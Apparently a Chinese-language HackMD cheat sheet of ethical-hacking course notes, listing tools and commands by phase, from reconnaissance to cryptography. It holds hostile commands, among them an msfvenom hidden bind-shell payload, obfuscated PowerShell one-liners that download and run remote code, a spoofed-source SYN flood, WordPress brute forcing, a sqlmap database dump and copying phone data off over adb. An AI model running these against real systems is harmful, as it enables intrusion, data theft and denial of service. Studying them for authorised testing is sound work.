Try   HackMD

這份筆記是課堂上講師有demo過的"工具"
系統內建指令、操作該筆記無紀錄
基本常用到爛掉的工具也不再此贅述

ls -al

Reconnaissance Techniques

footprinting reconnaissance

netcraft

theHarvester

theHarvester -d DOMAIN_NAME -l PORT_NUMBER -b (search engine)

web history

whois

whois DOMAIN_NAME

traceroute

traceroute DOMAIN_NAME

Recon-ng framework

recon-ng marketplace install all

Marketplace search

recon-ng][default] >marketplace search ssl

more inf

[recon-ng][default] > marketplace info ssltools

Load module

[recon-ng][default] > modules load hackertarget
[recon-ng][default][hackertarget] >

Set source

[recon-ng][default][hackertarget] > show options

set the source to the name of the domain

[recon-ng][default][hackertarget] > options set SOURCE tesla.com
SOURCE => tesla.com

Use command info. This shows current value has changed to tesla.com

[recon-ng][default][hackertarget] > info

Use input to see

[recon-ng][default][hackertarget] > input

Run the module

[recon-ng][default][hackertarget] > run

Show hosts

[recon-ng][default][hackertarget] > show hosts

whatweb

whatweb DOMAIN_NAME

OSINT map

scanning netwalk

hping3

功能 指令 說明
Ping 類似功能 hping3 -1 <目標IP> 使用 ICMP echo 請求對目標進行 ping 測試。
SYN 掃描 hping3 -S <目標IP> -p <目標端口範圍> 執行 TCP SYN 掃描,檢查哪些端口開放。
指定源 IP 地址 hping3 -a <偽造的源IP> -S <目標IP> -p <目標端口> 使用偽造的源 IP 地址發送 SYN 包。
UDP 掃描 hping3 -2 <目標IP> -p <目標端口> 對指定端口發送 UDP 包。
TRACEROUTE hping3 --traceroute -V -1 <目標IP> 執行類似 traceroute 的操作。
Flood 攻擊測試 hping3 -S <目標IP> -p <目標端口> --flood 向目標端口發送大量 SYN 包進行洪水攻擊測試。
指定封包大小 hping3 -S <目標IP> -p <目標端口> -d <封包大小> 指定封包大小(以字節為單位)。
發送特定數量的封包 hping3 -S <目標IP> -p <目標端口> -c <封包數量> 發送指定數量的封包。
發送特定的 TCP 標誌 hping3 -F -P -U <目標IP> -p <目標端口> 發送帶有 FIN、PUSH 和 URG 標誌的 TCP 封包。

nmap

Nmap flag 說明
-sV 使用此標誌可以獲得服務版本資訊,有助於進一步的漏洞掃描。
-p <x> or -p- 指定特定端口或掃描所有端口,可以快速聚焦於目標服務。
-Pn 當目標主機可能阻止 ping 時使用此標誌,可以強制掃描端口。
-A 綜合性掃描,包括操作系統偵測和版本偵測,以及執行預設腳本,非常適合進行全面的評估。
-sC 結合預設腳本快速獲取常見漏洞和配置信息,適合快速初步評估。
-v 提供詳細的掃描過程資訊,有助於了解掃描進度及診斷問題。
-sU 掃描 UDP 端口,識別不常見的服務,適合全面的網絡評估。
-sS 半開放掃描,快速且隱蔽,適合在大量端口掃描時使用。
--top-ports <N> 快速掃描最常見的 N 個端口,節省時間並獲取關鍵資訊。
--script <script-name> 使用特定的 Nmap 腳本進行自定義掃描,可針對特定漏洞或配置進行檢查。
-oA <output-basename> 將結果保存為多種格式,便於後續分析和報告。
-T4 加快掃描速度,適合在局域網或掃描時間有限的情況下使用。
-D RND:(n) 偽造n個來源ip
--spoof-mac 0 偽造MAC

enumeration

nmap萬用工具

locate *(ENUM_protocol)*.nse
    
nmap --script=

snmp-check (161 port open)

snmp-check DOMAIN_NAME

smtp (25 port open)

smtp (-f smtp-ips.txt)/(-h HOST) -e /usr/share/wordlists/metasploit/unix_users.txt

enum4linux (445 port open)

enum4linux ip_addres

System Hacking Phases and Attack Techniques

vulnerability analysis

NVD

CWE

OpenVAS / GVM (software)

nikto (for web "server")

nikto -h ip_addres

system hacking

responder

responder -I eth0 -wrf

msfvenom

msfvenom -p windows/shell_hidden_bind_tcp ahost=IP_ADDRES lport=PORT_NUMBER -f exe > spy.exe

malware threats

obfuscation

,;cmd.exe,/c,;,echo;powershell.exe -NoExit -exec bypass -nop Invoke-Expression(New-Object System.Net.WebClient).DownloadString(‘https://targetwebsite.com”)&&echo,exit

C:\WINDOWS\system32\cmd.exe /c p^^o^^w^^e^^r^^s^^h^^e^^l^^l^^.^^e^^x^^e -No^^Exit -exec bypass -nop Invoke-Expression (New-Object System.Net.WebClient). DownloadString((‘https://targetwebsite.com”)&&echo,exit

analysis

anyrun

virustotal

PeStudio

Tcpview

Network and Perimeter Hacking

sniffing

MAC Flooding

macof

sudo macof

social engineering

setoolkit

setoolkit

denial-fo-service

hping3

hping3 --flood --rand-source -S -p 80 DOMAIN_NAME

LOIC

session hijacking

hunt

parrot@G:~/hunt-1.5$ sudo ./hunt
/*
 *      hunt 1.5
 *      multipurpose connection intruder / sniffer for Linux
 *      (c) 1998-2000 by kra
 */
starting hunt
--- Main Menu --- rcvpkt 0, free/alloc 63/64 ------
l/w/r) list/watch/reset connections
u)     host up tests
a)     arp/simple hijack (avoids ack storm if arp used)
s)     simple hijack
d)     daemons rst/arp/sniff/mac
o)     options
x)     exit
->

evading IDS firewalls honeypots

紙上談兵

Web Application Hacking

Hacking web server

whatweb

whatweb -v DOMAIN_NAME

netcat

nc -vv DOMAIN_NAME

nikto

nikto -h DOMAIN_NAME

gobuster

gobuster dir -u URL -w WORDLIST

hacking web application

wafw00f

wafw00f DOMAIN_NAME

wordpress login attack

burpsuitepro

至於pro哪來的呵!
搞資安的自己想🙃

msfconsole

msf6 auxiliary(scanner/http/wordpress_login_enum) > options

Module options (auxiliary/scanner/http/wordpress_login_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   ANONYMOUS_LOGIN      false            yes       Attempt to login with a blank username and password
   BLANK_PASSWORDS      false            no        Try blank passwords for all users
   BRUTEFORCE           true             yes       Perform brute force authentication
   BRUTEFORCE_SPEED     5                yes       How fast to bruteforce, from 0 to 5
   DB_ALL_CREDS         false            no        Try each user/password couple stored in the current database
   DB_ALL_PASS          false            no        Add all passwords in the current database to the list
   DB_ALL_USERS         false            no        Add all users in the current database to the list
   DB_SKIP_EXISTING     none             no        Skip existing credentials stored in the current database (Accepted: none, user,
                                                   user&realm)
   ENUMERATE_USERNAMES  true             yes       Enumerate usernames
   PASSWORD                              no        A specific password to authenticate with
   PASS_FILE                             no        File containing passwords, one per line
   Proxies                               no        A proxy chain of format type:host:port[,type:host:port][...]
   RANGE_END            10               no        Last user id to enumerate
   RANGE_START          1                no        First user id to enumerate
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics
                                                   /using-metasploit.html
   RPORT                80               yes       The target port (TCP)
   SSL                  false            no        Negotiate SSL/TLS for outgoing connections
   STOP_ON_SUCCESS      false            yes       Stop guessing when a credential works for a host
   TARGETURI            /                yes       The base path to the wordpress application
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME                              no        A specific username to authenticate as
   USERPASS_FILE                         no        File containing users and passwords separated by space, one pair per line
   USER_AS_PASS         false            no        Try the username as the password for all users
   USER_FILE                             no        File containing usernames, one per line
   VALIDATE_USERS       true             yes       Validate usernames
   VERBOSE              true             yes       Whether to print output for all attempts
   VHOST                                 no        HTTP server virtual host

sql injection

sqlmap

sqlmap -u URL --dbs
sqlmap -u URL -D DBNAME --tables
sqlmap -u URL -D DBNAME -T TBNAME --dump

Wireless Network Hacking

hacking wireless networks

aircrack-ng

aircrack-ng FILE

aircrack-ng -w WORDLIST FILE

Mobile Platform, IoT, and OT Hacking

hacking mobile platforms

adb

adb connect IP_ADDRES:PORT
adb-s IP_ADDRES:PORT shell

scp -r /data USER@IP_ADDRES:/work

IoT OT hacking

理論

Cloud Computing

cloud computing

理論

Cryptography

crytography

one way hash

echo 123 > file
sha1sum file
Last changed by 
www.chengyunpu.com
0
1
127
Published on HackMD